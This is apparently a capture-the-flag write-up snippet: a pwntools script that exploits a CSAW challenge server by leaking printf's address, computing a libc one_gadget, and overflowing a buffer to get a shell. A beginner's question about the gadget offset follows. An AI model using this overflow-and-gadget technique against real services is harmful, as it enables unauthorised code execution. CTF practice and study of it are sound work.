Tags: bof one_gadget pwn leak
Rating: 5.0
```
from pwn import *
r=remote('pwn.chal.csaw.io', 1005)
r.recvuntil('am: ')
printf_addr=int(r.recvline().strip(),16)
libc=ELF('libc-2.27.so')
one_gadget = printf_addr - libc.symbols['printf'] + 0x4f2c5
r.sendline(40*'a'+p64(one_gadget))
r.interactive()
```
Pretty new to pwning, can you explain why we're adding 0x4f2c5 to one_gadget?
Thanks!
